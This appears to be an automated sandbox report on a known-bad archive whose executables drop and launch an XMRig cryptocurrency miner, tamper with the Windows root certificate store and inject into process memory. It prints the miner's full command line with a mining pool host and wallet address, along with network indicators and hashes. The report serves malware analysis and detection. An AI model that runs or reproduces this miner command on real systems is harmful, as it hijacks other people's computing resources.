Analysis Overview
SHA256
2712cfc84e57a8c2c3637bc69d65c1741fcb7a600c78709bbe3d47c5f76a4293
Threat Level: Known bad
The file packer.zip was found to be: Known bad.
Malicious Activity Summary
XMRig Miner payload
xmrig
Executes dropped EXE
Unsigned PE
Modifies system certificate store
Suspicious use of AdjustPrivilegeToken
Suspicious use of FindShellTrayWindow
Suspicious use of WriteProcessMemory
MITRE ATT&CK Matrix V13
Analysis: static1
Detonation Overview
Reported
2024-06-13 14:59
Signatures
Unsigned PE
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
Analysis: behavioral16
Detonation Overview
Submitted
2024-06-13 14:58
Reported
2024-06-13 16:16
Platform
win10v2004-20240611-en
Max time kernel
1792s
Max time network
1789s
Command Line
Signatures
XMRig Miner payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
xmrig
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe | N/A |
Modifies system certificate store
| Description | Indicator | Process | Target |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349 | C:\Users\Admin\AppData\Local\Temp\main - Copy (9) - Copy.exe | N/A |
| Set value (data) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349\Blob = 0f00000001000000140000003e8e6487f8fd27d322a269a71edaac5d57811286090000000100000054000000305206082b0601050507030206082b06010505070303060a2b0601040182370a030406082b0601050507030406082b0601050507030606082b0601050507030706082b0601050507030106082b0601050507030853000000010000004300000030413022060c2b06010401b231010201050130123010060a2b0601040182373c0101030200c0301b060567810c010330123010060a2b0601040182373c0101030200c0620000000100000020000000d7a7a0fb5d7e2731d771e9484ebcdef71d5f0c3e0a2948782bc83ee0ea699ef40b000000010000001c0000005300650063007400690067006f002000280041004100410029000000140000000100000014000000a0110a233e96f107ece2af29ef82a57fd030a4b41d00000001000000100000002e0d6875874a44c820912e85e964cfdb030000000100000014000000d1eb23a46d17d68fd92564c2f1f1601764d8e349200000000100000036040000308204323082031aa003020102020101300d06092a864886f70d0101050500307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c18414141204365727469666963617465205365727669636573301e170d3034303130313030303030305a170d3238313233313233353935395a307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c1841414120436572746966696361746520536572766963657330820122300d06092a864886f70d01010105000382010f003082010a0282010100be409df46ee1ea76871c4d45448ebe46c883069dc12afe181f8ee402faf3ab5d508a16310b9a06d0c57022cd492d5463ccb66e68460b53eacb4c24c0bc724eeaf115aef4549a120ac37ab23360e2da8955f32258f3dedccfef8386a28c944f9f68f29890468427c776bfe3cc352c8b5e07646582c048b0a891f9619f762050a891c766b5eb78620356f08a1a13ea31a31ea099fd38f6f62732586f07f56bb8fb142bafb7aaccd6635f738cda0599a838a8cb17783651ace99ef4783a8dcf0fd942e2980cab2f9f0e01deef9f9949f12ddfac744d1b98b547c5e529d1f99018c7629cbe83c7267b3e8a25c7c0dd9de6356810209d8fd8ded2c3849c0d5ee82fc90203010001a381c03081bd301d0603551d0e04160414a0110a233e96f107ece2af29ef82a57fd030a4b4300e0603551d0f0101ff040403020106300f0603551d130101ff040530030101ff307b0603551d1f047430723038a036a0348632687474703a2f2f63726c2e636f6d6f646f63612e636f6d2f414141436572746966696361746553657276696365732e63726c3036a034a0328630687474703a2f2f63726c2e636f6d6f646f2e6e65742f414141436572746966696361746553657276696365732e63726c300d06092a864886f70d010105050003820101000856fc02f09be8ffa4fad67bc64480ce4fc4c5f60058cca6b6bc1449680476e8e6ee5dec020f60d68d50184f264e01e3e6b0a5eebfbc745441bffdfc12b8c74f5af48960057f60b7054af3f6f1c2bfc4b97486b62d7d6bccd2f346dd2fc6e06ac3c334032c7d96dd5ac20ea70a99c1058bab0c2ff35c3acf6c37550987de53406c58effcb6ab656e04f61bdc3ce05a15c69ed9f15948302165036cece92173ec9b03a1e037ada015188ffaba02cea72ca910132cd4e50826ab229760f8905e74d4a29a53bdf2a968e0a26ec2d76cb1a30f9ebfeb68e756f2aef2e32b383a0981b56b85d7be2ded3f1ab7b263e2f5622c82d46a004150f139839f95e93696986e | C:\Users\Admin\AppData\Local\Temp\main - Copy (9) - Copy.exe | N/A |
| Set value (data) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349\Blob = 1900000001000000100000002aa1c05e2ae606f198c2c5e937c97aa2030000000100000014000000d1eb23a46d17d68fd92564c2f1f1601764d8e3491d00000001000000100000002e0d6875874a44c820912e85e964cfdb140000000100000014000000a0110a233e96f107ece2af29ef82a57fd030a4b40b000000010000001c0000005300650063007400690067006f002000280041004100410029000000620000000100000020000000d7a7a0fb5d7e2731d771e9484ebcdef71d5f0c3e0a2948782bc83ee0ea699ef453000000010000004300000030413022060c2b06010401b231010201050130123010060a2b0601040182373c0101030200c0301b060567810c010330123010060a2b0601040182373c0101030200c0090000000100000054000000305206082b0601050507030206082b06010505070303060a2b0601040182370a030406082b0601050507030406082b0601050507030606082b0601050507030706082b0601050507030106082b060105050703080f00000001000000140000003e8e6487f8fd27d322a269a71edaac5d57811286200000000100000036040000308204323082031aa003020102020101300d06092a864886f70d0101050500307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c18414141204365727469666963617465205365727669636573301e170d3034303130313030303030305a170d3238313233313233353935395a307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c1841414120436572746966696361746520536572766963657330820122300d06092a864886f70d01010105000382010f003082010a0282010100be409df46ee1ea76871c4d45448ebe46c883069dc12afe181f8ee402faf3ab5d508a16310b9a06d0c57022cd492d5463ccb66e68460b53eacb4c24c0bc724eeaf115aef4549a120ac37ab23360e2da8955f32258f3dedccfef8386a28c944f9f68f29890468427c776bfe3cc352c8b5e07646582c048b0a891f9619f762050a891c766b5eb78620356f08a1a13ea31a31ea099fd38f6f62732586f07f56bb8fb142bafb7aaccd6635f738cda0599a838a8cb17783651ace99ef4783a8dcf0fd942e2980cab2f9f0e01deef9f9949f12ddfac744d1b98b547c5e529d1f99018c7629cbe83c7267b3e8a25c7c0dd9de6356810209d8fd8ded2c3849c0d5ee82fc90203010001a381c03081bd301d0603551d0e04160414a0110a233e96f107ece2af29ef82a57fd030a4b4300e0603551d0f0101ff040403020106300f0603551d130101ff040530030101ff307b0603551d1f047430723038a036a0348632687474703a2f2f63726c2e636f6d6f646f63612e636f6d2f414141436572746966696361746553657276696365732e63726c3036a034a0328630687474703a2f2f63726c2e636f6d6f646f2e6e65742f414141436572746966696361746553657276696365732e63726c300d06092a864886f70d010105050003820101000856fc02f09be8ffa4fad67bc64480ce4fc4c5f60058cca6b6bc1449680476e8e6ee5dec020f60d68d50184f264e01e3e6b0a5eebfbc745441bffdfc12b8c74f5af48960057f60b7054af3f6f1c2bfc4b97486b62d7d6bccd2f346dd2fc6e06ac3c334032c7d96dd5ac20ea70a99c1058bab0c2ff35c3acf6c37550987de53406c58effcb6ab656e04f61bdc3ce05a15c69ed9f15948302165036cece92173ec9b03a1e037ada015188ffaba02cea72ca910132cd4e50826ab229760f8905e74d4a29a53bdf2a968e0a26ec2d76cb1a30f9ebfeb68e756f2aef2e32b383a0981b56b85d7be2ded3f1ab7b263e2f5622c82d46a004150f139839f95e93696986e | C:\Users\Admin\AppData\Local\Temp\main - Copy (9) - Copy.exe | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeLockMemoryPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe | N/A |
| Token: SeLockMemoryPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe | N/A |
Suspicious use of FindShellTrayWindow
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe | N/A |
Suspicious use of WriteProcessMemory
| Description | Indicator | Process | Target |
| PID 5084 wrote to memory of 2996 | N/A | C:\Users\Admin\AppData\Local\Temp\main - Copy (9) - Copy.exe | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe |
| PID 5084 wrote to memory of 2996 | N/A | C:\Users\Admin\AppData\Local\Temp\main - Copy (9) - Copy.exe | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe |
Processes
C:\Users\Admin\AppData\Local\Temp\main - Copy (9) - Copy.exe
"C:\Users\Admin\AppData\Local\Temp\main - Copy (9) - Copy.exe"
C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe
xmrig-6.21.0\xmrig.exe --url pool.hashvault.pro:80 --user 46DiTxnXmukGpoGKFDViugiZA1Zuu181wJGSTvGVyJUv4HAdJaozh3jMX7nAEauswGVAUvLnY6tai2AbiKv9Pbt2EAsu8yR --pass T --donate-level 1 --tls --tls-fingerprint 420c7850e09b7c0bdcf748a7da9eb3647daf8515718f36d9ccfdd6b9ff834b14
Network
| Country | Destination | Domain | Proto |
| US | 204.79.197.237:443 | g.bing.com | tcp |
| US | 8.8.8.8:53 | g.bing.com | udp |
| BE | 2.17.107.130:443 | www.bing.com | tcp |
| US | 8.8.8.8:53 | github.com | udp |
| US | 8.8.8.8:53 | 0.181.190.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 172.210.232.199.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 43.58.199.20.in-addr.arpa | udp |
| GB | 20.26.156.215:443 | github.com | tcp |
| US | 8.8.8.8:53 | objects.githubusercontent.com | udp |
| US | 185.199.111.133:443 | objects.githubusercontent.com | tcp |
| US | 8.8.8.8:53 | 130.107.17.2.in-addr.arpa | udp |
| US | 8.8.8.8:53 | pool.hashvault.pro | udp |
| DE | 95.179.241.203:80 | pool.hashvault.pro | tcp |
| US | 8.8.8.8:53 | 215.156.26.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 133.111.199.185.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 203.241.179.95.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 86.23.85.13.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 171.39.242.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 21.121.18.2.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 14.227.111.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 91.90.14.23.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 26.178.89.13.in-addr.arpa | udp |
Files
C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe
| MD5 | e2fe87cc2c7dab8ca6516620dccd1381 |
| SHA1 | f714ec0448325435103519452610cf7aadf8bbba |
| SHA256 | d0cf7388253342f43f9b04da27f3da9ee18614539efdc2d9c4a0239af51ddbe4 |
| SHA512 | 8455c47e8470e0e322426bc9b9f3c7e858d803bfc8c5d576d580f88585f550b95043139d69b0750a3e211915e3f5ec7a67e7784dcf8cac6bd8fe51ab7e9cbed6 |
memory/2996-14-0x000001B833F80000-0x000001B833FA0000-memory.dmp
memory/2996-15-0x000001B833FD0000-0x000001B833FF0000-memory.dmp
memory/2996-16-0x00007FF64FA80000-0x00007FF650583000-memory.dmp
memory/2996-17-0x000001B833FF0000-0x000001B834010000-memory.dmp
memory/2996-18-0x000001B834010000-0x000001B834030000-memory.dmp
memory/2996-19-0x00007FF64FA80000-0x00007FF650583000-memory.dmp
memory/2996-20-0x00007FF64FA80000-0x00007FF650583000-memory.dmp
memory/2996-23-0x000001B834010000-0x000001B834030000-memory.dmp
memory/2996-22-0x000001B833FF0000-0x000001B834010000-memory.dmp
memory/2996-21-0x00007FF64FA80000-0x00007FF650583000-memory.dmp
memory/2996-24-0x00007FF64FA80000-0x00007FF650583000-memory.dmp
memory/2996-25-0x00007FF64FA80000-0x00007FF650583000-memory.dmp
memory/2996-26-0x00007FF64FA80000-0x00007FF650583000-memory.dmp
memory/2996-27-0x00007FF64FA80000-0x00007FF650583000-memory.dmp
memory/2996-28-0x00007FF64FA80000-0x00007FF650583000-memory.dmp
memory/2996-29-0x00007FF64FA80000-0x00007FF650583000-memory.dmp
memory/2996-30-0x00007FF64FA80000-0x00007FF650583000-memory.dmp
memory/2996-31-0x00007FF64FA80000-0x00007FF650583000-memory.dmp
memory/2996-32-0x00007FF64FA80000-0x00007FF650583000-memory.dmp
memory/2996-33-0x00007FF64FA80000-0x00007FF650583000-memory.dmp
memory/2996-34-0x00007FF64FA80000-0x00007FF650583000-memory.dmp
memory/2996-35-0x00007FF64FA80000-0x00007FF650583000-memory.dmp
memory/2996-36-0x00007FF64FA80000-0x00007FF650583000-memory.dmp
memory/2996-37-0x00007FF64FA80000-0x00007FF650583000-memory.dmp
memory/2996-38-0x00007FF64FA80000-0x00007FF650583000-memory.dmp
memory/2996-39-0x00007FF64FA80000-0x00007FF650583000-memory.dmp
memory/2996-40-0x00007FF64FA80000-0x00007FF650583000-memory.dmp
memory/2996-41-0x00007FF64FA80000-0x00007FF650583000-memory.dmp
memory/2996-42-0x00007FF64FA80000-0x00007FF650583000-memory.dmp
memory/2996-43-0x00007FF64FA80000-0x00007FF650583000-memory.dmp
memory/2996-44-0x00007FF64FA80000-0x00007FF650583000-memory.dmp
memory/2996-45-0x00007FF64FA80000-0x00007FF650583000-memory.dmp
memory/2996-46-0x00007FF64FA80000-0x00007FF650583000-memory.dmp
memory/2996-47-0x00007FF64FA80000-0x00007FF650583000-memory.dmp
memory/2996-48-0x00007FF64FA80000-0x00007FF650583000-memory.dmp
memory/2996-49-0x00007FF64FA80000-0x00007FF650583000-memory.dmp
memory/2996-50-0x00007FF64FA80000-0x00007FF650583000-memory.dmp
memory/2996-51-0x00007FF64FA80000-0x00007FF650583000-memory.dmp
memory/2996-52-0x00007FF64FA80000-0x00007FF650583000-memory.dmp
memory/2996-53-0x00007FF64FA80000-0x00007FF650583000-memory.dmp
memory/2996-54-0x00007FF64FA80000-0x00007FF650583000-memory.dmp
memory/2996-55-0x00007FF64FA80000-0x00007FF650583000-memory.dmp
memory/2996-56-0x00007FF64FA80000-0x00007FF650583000-memory.dmp
memory/2996-57-0x00007FF64FA80000-0x00007FF650583000-memory.dmp
memory/2996-58-0x00007FF64FA80000-0x00007FF650583000-memory.dmp
memory/2996-59-0x00007FF64FA80000-0x00007FF650583000-memory.dmp
memory/2996-60-0x00007FF64FA80000-0x00007FF650583000-memory.dmp
memory/2996-61-0x00007FF64FA80000-0x00007FF650583000-memory.dmp
memory/2996-62-0x00007FF64FA80000-0x00007FF650583000-memory.dmp
memory/2996-63-0x00007FF64FA80000-0x00007FF650583000-memory.dmp
memory/2996-64-0x00007FF64FA80000-0x00007FF650583000-memory.dmp
memory/2996-65-0x00007FF64FA80000-0x00007FF650583000-memory.dmp
memory/2996-66-0x00007FF64FA80000-0x00007FF650583000-memory.dmp
memory/2996-67-0x00007FF64FA80000-0x00007FF650583000-memory.dmp
memory/2996-68-0x00007FF64FA80000-0x00007FF650583000-memory.dmp
memory/2996-69-0x00007FF64FA80000-0x00007FF650583000-memory.dmp
memory/2996-70-0x00007FF64FA80000-0x00007FF650583000-memory.dmp
memory/2996-71-0x00007FF64FA80000-0x00007FF650583000-memory.dmp
memory/2996-72-0x00007FF64FA80000-0x00007FF650583000-memory.dmp
memory/2996-73-0x00007FF64FA80000-0x00007FF650583000-memory.dmp
memory/2996-74-0x00007FF64FA80000-0x00007FF650583000-memory.dmp
memory/2996-75-0x00007FF64FA80000-0x00007FF650583000-memory.dmp
memory/2996-76-0x00007FF64FA80000-0x00007FF650583000-memory.dmp
memory/2996-77-0x00007FF64FA80000-0x00007FF650583000-memory.dmp
memory/2996-78-0x00007FF64FA80000-0x00007FF650583000-memory.dmp
memory/2996-79-0x00007FF64FA80000-0x00007FF650583000-memory.dmp
memory/2996-80-0x00007FF64FA80000-0x00007FF650583000-memory.dmp
memory/2996-81-0x00007FF64FA80000-0x00007FF650583000-memory.dmp
memory/2996-82-0x00007FF64FA80000-0x00007FF650583000-memory.dmp
Analysis: behavioral17
Detonation Overview
Submitted
2024-06-13 14:58
Reported
2024-06-13 16:16
Platform
win10v2004-20240508-en
Max time kernel
1635s
Max time network
1647s
Command Line
Signatures
Processes
C:\Users\Admin\AppData\Local\Temp\main - Copy (9).exe
"C:\Users\Admin\AppData\Local\Temp\main - Copy (9).exe"
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | github.com | udp |
Files
Analysis: behavioral20
Detonation Overview
Submitted
2024-06-13 14:58
Reported
2024-06-13 16:18
Platform
win10v2004-20240508-en
Max time kernel
1791s
Max time network
1799s
Command Line
Signatures
Processes
C:\Users\Admin\AppData\Local\Temp\main.exe
"C:\Users\Admin\AppData\Local\Temp\main.exe"
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=asset_store.mojom.AssetStoreService --lang=en-US --service-sandbox-type=asset_store_service --no-appcompat-clear --field-trial-handle=4364,i,5047420736443372512,9747851268033796534,262144 --variations-seed-version --mojo-platform-channel-handle=4420 /prefetch:8
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=asset_store.mojom.AssetStoreService --lang=en-US --service-sandbox-type=asset_store_service --no-appcompat-clear --field-trial-handle=3788,i,5047420736443372512,9747851268033796534,262144 --variations-seed-version --mojo-platform-channel-handle=2396 /prefetch:8
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | github.com | udp |
| US | 8.8.8.8:53 | 8.8.8.8.in-addr.arpa | udp |
Files
Analysis: behavioral4
Detonation Overview
Submitted
2024-06-13 14:58
Reported
2024-06-13 15:59
Platform
win10v2004-20240508-en
Max time kernel
1629s
Max time network
1642s
Command Line
Signatures
Processes
C:\Users\Admin\AppData\Local\Temp\main - Copy (3) - Copy.exe
"C:\Users\Admin\AppData\Local\Temp\main - Copy (3) - Copy.exe"
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | github.com | udp |
Files
Analysis: behavioral6
Detonation Overview
Submitted
2024-06-13 14:58
Reported
2024-06-13 16:10
Platform
win10v2004-20240508-en
Max time kernel
1714s
Max time network
1727s
Command Line
Signatures
Processes
C:\Users\Admin\AppData\Local\Temp\main - Copy (4) - Copy.exe
"C:\Users\Admin\AppData\Local\Temp\main - Copy (4) - Copy.exe"
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | github.com | udp |
Files
Analysis: behavioral11
Detonation Overview
Submitted
2024-06-13 14:58
Reported
2024-06-13 16:12
Platform
win10v2004-20240611-en
Max time kernel
1793s
Max time network
1800s
Command Line
Signatures
XMRig Miner payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
xmrig
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe | N/A |
Modifies system certificate store
| Description | Indicator | Process | Target |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349 | C:\Users\Admin\AppData\Local\Temp\main - Copy (6).exe | N/A |
| Set value (data) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349\Blob = 0f00000001000000140000003e8e6487f8fd27d322a269a71edaac5d57811286090000000100000054000000305206082b0601050507030206082b06010505070303060a2b0601040182370a030406082b0601050507030406082b0601050507030606082b0601050507030706082b0601050507030106082b0601050507030853000000010000004300000030413022060c2b06010401b231010201050130123010060a2b0601040182373c0101030200c0301b060567810c010330123010060a2b0601040182373c0101030200c0620000000100000020000000d7a7a0fb5d7e2731d771e9484ebcdef71d5f0c3e0a2948782bc83ee0ea699ef40b000000010000001c0000005300650063007400690067006f002000280041004100410029000000140000000100000014000000a0110a233e96f107ece2af29ef82a57fd030a4b41d00000001000000100000002e0d6875874a44c820912e85e964cfdb030000000100000014000000d1eb23a46d17d68fd92564c2f1f1601764d8e349200000000100000036040000308204323082031aa003020102020101300d06092a864886f70d0101050500307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c18414141204365727469666963617465205365727669636573301e170d3034303130313030303030305a170d3238313233313233353935395a307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c1841414120436572746966696361746520536572766963657330820122300d06092a864886f70d01010105000382010f003082010a0282010100be409df46ee1ea76871c4d45448ebe46c883069dc12afe181f8ee402faf3ab5d508a16310b9a06d0c57022cd492d5463ccb66e68460b53eacb4c24c0bc724eeaf115aef4549a120ac37ab23360e2da8955f32258f3dedccfef8386a28c944f9f68f29890468427c776bfe3cc352c8b5e07646582c048b0a891f9619f762050a891c766b5eb78620356f08a1a13ea31a31ea099fd38f6f62732586f07f56bb8fb142bafb7aaccd6635f738cda0599a838a8cb17783651ace99ef4783a8dcf0fd942e2980cab2f9f0e01deef9f9949f12ddfac744d1b98b547c5e529d1f99018c7629cbe83c7267b3e8a25c7c0dd9de6356810209d8fd8ded2c3849c0d5ee82fc90203010001a381c03081bd301d0603551d0e04160414a0110a233e96f107ece2af29ef82a57fd030a4b4300e0603551d0f0101ff040403020106300f0603551d130101ff040530030101ff307b0603551d1f047430723038a036a0348632687474703a2f2f63726c2e636f6d6f646f63612e636f6d2f414141436572746966696361746553657276696365732e63726c3036a034a0328630687474703a2f2f63726c2e636f6d6f646f2e6e65742f414141436572746966696361746553657276696365732e63726c300d06092a864886f70d010105050003820101000856fc02f09be8ffa4fad67bc64480ce4fc4c5f60058cca6b6bc1449680476e8e6ee5dec020f60d68d50184f264e01e3e6b0a5eebfbc745441bffdfc12b8c74f5af48960057f60b7054af3f6f1c2bfc4b97486b62d7d6bccd2f346dd2fc6e06ac3c334032c7d96dd5ac20ea70a99c1058bab0c2ff35c3acf6c37550987de53406c58effcb6ab656e04f61bdc3ce05a15c69ed9f15948302165036cece92173ec9b03a1e037ada015188ffaba02cea72ca910132cd4e50826ab229760f8905e74d4a29a53bdf2a968e0a26ec2d76cb1a30f9ebfeb68e756f2aef2e32b383a0981b56b85d7be2ded3f1ab7b263e2f5622c82d46a004150f139839f95e93696986e | C:\Users\Admin\AppData\Local\Temp\main - Copy (6).exe | N/A |
| Set value (data) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349\Blob = 1900000001000000100000002aa1c05e2ae606f198c2c5e937c97aa2030000000100000014000000d1eb23a46d17d68fd92564c2f1f1601764d8e3491d00000001000000100000002e0d6875874a44c820912e85e964cfdb140000000100000014000000a0110a233e96f107ece2af29ef82a57fd030a4b40b000000010000001c0000005300650063007400690067006f002000280041004100410029000000620000000100000020000000d7a7a0fb5d7e2731d771e9484ebcdef71d5f0c3e0a2948782bc83ee0ea699ef453000000010000004300000030413022060c2b06010401b231010201050130123010060a2b0601040182373c0101030200c0301b060567810c010330123010060a2b0601040182373c0101030200c0090000000100000054000000305206082b0601050507030206082b06010505070303060a2b0601040182370a030406082b0601050507030406082b0601050507030606082b0601050507030706082b0601050507030106082b060105050703080f00000001000000140000003e8e6487f8fd27d322a269a71edaac5d57811286200000000100000036040000308204323082031aa003020102020101300d06092a864886f70d0101050500307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c18414141204365727469666963617465205365727669636573301e170d3034303130313030303030305a170d3238313233313233353935395a30